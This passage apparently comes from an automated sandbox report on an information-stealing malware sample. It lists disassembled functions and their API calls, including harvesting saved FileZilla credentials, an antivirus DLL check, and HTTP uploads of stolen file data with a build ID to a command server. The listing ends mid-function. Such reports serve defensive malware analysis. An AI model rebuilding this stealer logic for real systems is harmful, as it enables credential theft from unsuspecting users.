                                                                                                                  APIs
                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00410D49
                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00410D50
                                                                                                                  • GetTimeZoneInformation.KERNEL32(?), ref: 00410D5F
                                                                                                                  • wsprintfA.USER32 ref: 00410D7D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 362916592-0
                                                                                                                  • Opcode ID: 8121b2989182859caeafca9d685060af6f757cf6148b1a30633017c65544c455
                                                                                                                  • Instruction ID: 3462f644bc87497e0213169472e2bde5c7d2207eb6d596ae75af8f0473202e49
                                                                                                                  • Opcode Fuzzy Hash: 8121b2989182859caeafca9d685060af6f757cf6148b1a30633017c65544c455
                                                                                                                  • Instruction Fuzzy Hash: 78F0E070A0132467EB04DFB4EC49B9B37659B04729F100295F511D71D0EB759E848785
                                                                                                                  Function 00410C53 Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
                                                                                                                  • GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Heap$AllocNameProcessUser
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1206570057-0
                                                                                                                  • Opcode ID: 51a8186674da40b627bafe0667fb054b0b372cb9ea4a64be279c17a6e1cb1c3a
                                                                                                                  • Instruction ID: a2d0142ef4c2f8337792e91bc85231d42bd55b383edadc254ac7c872ecc74bf6
                                                                                                                  • Opcode Fuzzy Hash: 51a8186674da40b627bafe0667fb054b0b372cb9ea4a64be279c17a6e1cb1c3a
                                                                                                                  • Instruction Fuzzy Hash: 33D05EB6200208BBD7449BD5EC8DF8E7BBCEB85725F100265FA46D2290DAF099488B34
                                                                                                                  Function 00410FBA Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: InfoSystemwsprintf
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2452939696-0
                                                                                                                  • Opcode ID: 67b530403a9dc94f78866dc1dd254330b8edc701593f238e5f24d625af2237fc
                                                                                                                  • Instruction ID: 6e5c45132ae1b45d6529ef5bd4d0c5c9796b2e2d3bf3e93bb3fd0621c026135a
                                                                                                                  • Opcode Fuzzy Hash: 67b530403a9dc94f78866dc1dd254330b8edc701593f238e5f24d625af2237fc
                                                                                                                  • Instruction Fuzzy Hash: E8E092B0D1020D9BCF04DF60EC459DE77FCEB08208F4055B5A505E3180D674AB89CF44
                                                                                                                  Function 004014AD Relevance: 1.3, APIs: 1, Instructions: 40stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • lstrcmpiW.KERNEL32(?,?,?,?,?,?,00401503,avghookx.dll,00418544), ref: 004014DF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcmpi
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1586166983-0
                                                                                                                  • Opcode ID: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
                                                                                                                  • Instruction ID: b529297655fd12c0b63a16027a5c7bdef515ed443d31e096b8a78f326fd23762
                                                                                                                  • Opcode Fuzzy Hash: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
                                                                                                                  • Instruction Fuzzy Hash: C1F08C32A00150EBCF20CF59D804AAAFBB8EB43760F257065E809B3260C334ED11EA9C
                                                                                                                  Function 00405482 Relevance: 72.3, APIs: 25, Strings: 16, Instructions: 573stringnetworkmemoryCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 29 405482-405593 call 4104e7 call 410519 call 404ab6 call 411e5d lstrlenA call 411e5d call 4104e7 * 4 StrCmpCA 48 405595 29->48 49 40559b-4055a1 29->49 48->49 50 4055a3-4055b8 InternetOpenA 49->50 51 4055be-4056ce call 411c4a call 4105c7 call 41058d call 402920 * 2 call 410609 call 4105c7 call 410609 call 41058d call 402920 * 3 call 410609 call 4105c7 call 41058d call 402920 * 2 InternetConnectA 49->51 50->51 52 405e64-405eec call 402920 * 4 call 410519 call 402920 * 3 50->52 51->52 118 4056d4-405712 HttpOpenRequestA 51->118 86 405eee-405f2e call 402920 * 6 call 41d016 52->86 119 405e58-405e5e InternetCloseHandle 118->119 120 405718-40571e 118->120 119->52 121 405720-405736 InternetSetOptionA 120->121 122 40573c-405d77 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 lstrlenA * 2 GetProcessHeap HeapAlloc lstrlenA call 427050 lstrlenA call 427050 lstrlenA * 2 call 427050 lstrlenA HttpSendRequestA HttpQueryInfoA 120->122 121->122 309 405db5-405dc5 call 411afd 122->309 310 405d79-405db0 call 4104e7 call 402920 * 3 122->310 315 405dcb-405dd0 309->315 316 405f2f 309->316 310->86 318 405e11-405e2e InternetReadFile 315->318 320 405e30-405e43 StrCmpCA 318->320 321 405dd2-405dda 318->321 324 405e45-405e46 ExitProcess 320->324 325 405e4c-405e52 InternetCloseHandle 320->325 321->320 323 405ddc-405e0c call 410609 call 41058d call 402920 321->323 323->318 325->119
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                    • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                    • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                    • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                    • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                    • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                    • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 00405519
                                                                                                                    • Part of subcall function 00411E5D: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,0065E908,?,?,?,004128A1,?,?,00000000), ref: 00411E7D
                                                                                                                    • Part of subcall function 00411E5D: GetProcessHeap.KERNEL32(00000000,?,?,?,?,004128A1,?,?,00000000), ref: 00411E8A
                                                                                                                    • Part of subcall function 00411E5D: HeapAlloc.KERNEL32(00000000,?,?,?,004128A1,?,?,00000000), ref: 00411E91
                                                                                                                  • StrCmpCA.SHLWAPI(?,00436986,0043697B,0043697A,0043696F), ref: 00405588
                                                                                                                  • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004055AA
                                                                                                                  • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004056C0
                                                                                                                  • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00405704
                                                                                                                  • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405736
                                                                                                                    • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                    • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                    • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                    • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                    • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                  • lstrlenA.KERNEL32(?,",file_data,00437850,------,00437844,?,",00437838,------,0043782C,2ee1445fc63bc20d0e7966867b13e0e1,",build_id,00437814,------), ref: 00405C67
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 00405C7A
                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00405C92
                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00405C99
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 00405CA6
                                                                                                                  • _memmove.LIBCMT ref: 00405CB4
                                                                                                                  • lstrlenA.KERNEL32(?,?,?), ref: 00405CC9
                                                                                                                  • _memmove.LIBCMT ref: 00405CD6
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 00405CE4
                                                                                                                  • lstrlenA.KERNEL32(?,?,00000000), ref: 00405CF2
                                                                                                                  • _memmove.LIBCMT ref: 00405D05
                                                                                                                  • lstrlenA.KERNEL32(?,?,00000000), ref: 00405D1A
                                                                                                                  • HttpSendRequestA.WININET(?,?,00000000), ref: 00405D2D
                                                                                                                  • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00405D6F
                                                                                                                  • InternetReadFile.WININET(?,?,000007CF,?), ref: 00405E26
                                                                                                                  • StrCmpCA.SHLWAPI(?,block), ref: 00405E3B
                                                                                                                  • ExitProcess.KERNEL32 ref: 00405E46
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrlen$Internetlstrcpy$Heap$HttpProcess_memmove$AllocOpenRequestlstrcat$BinaryConnectCrackCryptExitFileInfoOptionQueryReadSendString
                                                                                                                  • String ID: ------$"$"$"$"$--$------$------$------$------$2ee1445fc63bc20d0e7966867b13e0e1$ERROR$ERROR$block$build_id$file_data
                                                                                                                  • API String ID: 2638065154-3389637935
                                                                                                                  • Opcode ID: 728df9254f14c32eb0309421fbc2d51be9a45682cb524dc00f6aca4526101756
                                                                                                                  • Instruction ID: a1f310b16752a75a1e3861b17425502ee47d614580a36b5f1e1f8e1f13a41955
                                                                                                                  • Opcode Fuzzy Hash: 728df9254f14c32eb0309421fbc2d51be9a45682cb524dc00f6aca4526101756
                                                                                                                  • Instruction Fuzzy Hash: 3742E671D401699BDF21FB21DC45ACDB3B9BF04308F0085E6A548B3152DAB86FCA9F98
                                                                                                                  Function 0040E6CF Relevance: 70.3, APIs: 30, Strings: 10, Instructions: 289stringmemoryCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                    • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                    • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                    • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                    • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                    • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                    • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                    • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                    • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                    • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                    • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                    • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                    • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                    • Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                                  • strtok_s.MSVCRT ref: 0040E77E
                                                                                                                  • GetProcessHeap.KERNEL32(00000000,000F423F,00436912,0043690F,0043690E,0043690D), ref: 0040E7C4
                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0040E7CB
                                                                                                                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040E7DF
                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040E7EA
                                                                                                                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040E81E
                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040E829
                                                                                                                  • StrStrA.SHLWAPI(00000000,<User>), ref: 0040E857
                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040E862
                                                                                                                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040E890
                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040E89B
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 0040E901
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 0040E915
                                                                                                                  • lstrlenA.KERNEL32(0040ECBC), ref: 0040EA3D
                                                                                                                    • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                    • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitstrtok_s
                                                                                                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
                                                                                                                  • API String ID: 4146028692-935134978
                                                                                                                  • Opcode ID: daf18828ca77f1c77d3f07f28c52861645635e7fac20ced428b2830730ead7d9
                                                                                                                  • Instruction ID: 2e9f852a615408e756f1d7d3730d5668bfc6bf7d6dc94c0724fe4efb67adb4f0
                                                                                                                  • Opcode Fuzzy Hash: daf18828ca77f1c77d3f07f28c52861645635e7fac20ced428b2830730ead7d9
                                                                                                                  • Instruction Fuzzy Hash: 6FA17572A40219BBCF01FBA1DD4AADD7775AF08305F105426F501F30A1EBB9AE498F99
                                                                                                                  Function 00406BB5 Relevance: 63.6, APIs: 20, Strings: 16, Instructions: 598networkstringmemoryCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 451 406bb5-406c7a call 410519 call 404ab6 call 4104e7 * 5 InternetOpenA StrCmpCA 466 406c82-406c88 451->466 467 406c7c 451->467 468 40763e-407666 InternetCloseHandle call 408048 466->468 469 406c8e-406e18 call 411c4a call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 4105c7 call 41058d call 402920 * 2 InternetConnectA 466->469 467->466 474 4076a5-40773e call 402920 * 4 call 401cde call 402920 * 3 call 41d016 468->474 475 407668-4076a0 call 410549 call 410609 call 41058d call 402920 468->475 469->468 549 406e1e-406e58 HttpOpenRequestA 469->549 475->474 550 407632-407638 InternetCloseHandle 549->550 551 406e5e-406e64 549->551 550->468 552 406e82-4075cf call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 lstrlenA * 2 GetProcessHeap HeapAlloc lstrlenA call 427050 lstrlenA * 2 call 427050 lstrlenA HttpSendRequestA 551->552 553 406e66-406e7c InternetSetOptionA 551->553 792 407611-407629 InternetReadFile 552->792 553->552 793 4075d1-4075d9 792->793 794 40762b-40762c InternetCloseHandle 792->794 793->794 795 4075db-40760c call 410609 call 41058d call 402920 793->795 794->550 795->792
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                    • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                    • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                    • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                    • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                    • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                  • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00406C54
                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 00406C72
                                                                                                                  • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406E0A
                                                                                                                  • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00406E4E
                                                                                                                  • lstrlenA.KERNEL32(?,",status,00437998,------,0043798C,",task_id,00437978,------,0043796C,",mode,00437958,------,0043794C), ref: 0040753C
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 0040754B
                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407556
                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0040755D
